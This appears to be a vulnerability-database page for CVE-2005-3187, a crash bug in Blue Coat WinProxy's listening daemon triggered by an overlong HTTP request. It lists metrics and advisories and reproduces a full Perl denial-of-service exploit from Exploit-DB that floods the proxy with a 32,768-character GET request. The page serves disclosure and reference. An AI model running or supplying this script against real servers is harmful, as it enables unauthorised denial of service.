CVE-2005-3187 : Detail

CVE-2005-3187

5.22%V4
Network
2006-01-05
22h00 +00:00
2009-02-26
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The listening daemon in Blue Coat Systems Inc. WinProxy before 6.1a allows remote attackers to cause a denial of service (crash) via a long HTTP request that causes an out-of-bounds read.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1409

Publication date : 2006-01-06 23h00 +00:00
Author : FistFuXXer
EDB Verified : Yes

#!perl # # "WinProxy 6.0 R1c" Remote DoS Exploit # # Author: FistFucker # e-Mail: FistFuXXer@gmx.de # # # Advisory: # http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363 # # CVE info: # CAN-2005-3187 # use IO::Socket; # # destination IP address # $ip = '127.0.0.1'; # # destination TCP port # $port = 80; print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n"; $sock = IO::Socket::INET->new ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', Timeout => 2 ) or print '[-] Error: Could not establish a connection to the server!' and exit(1); print "[+] Connected.\n"; $sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n"); print "[+] DoS string has been sent."; close($sock); # milw0rm.com [2006-01-07]

Products Mentioned

Configuraton 0

Bluecoat>>Winproxy >> Version 6.0

References

http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
Tags : third-party-advisory, x_refsource_IDEFENSE
http://www.vupen.com/english/advisories/2006/0065
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/18288
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/16148
Tags : vdb-entry, x_refsource_BID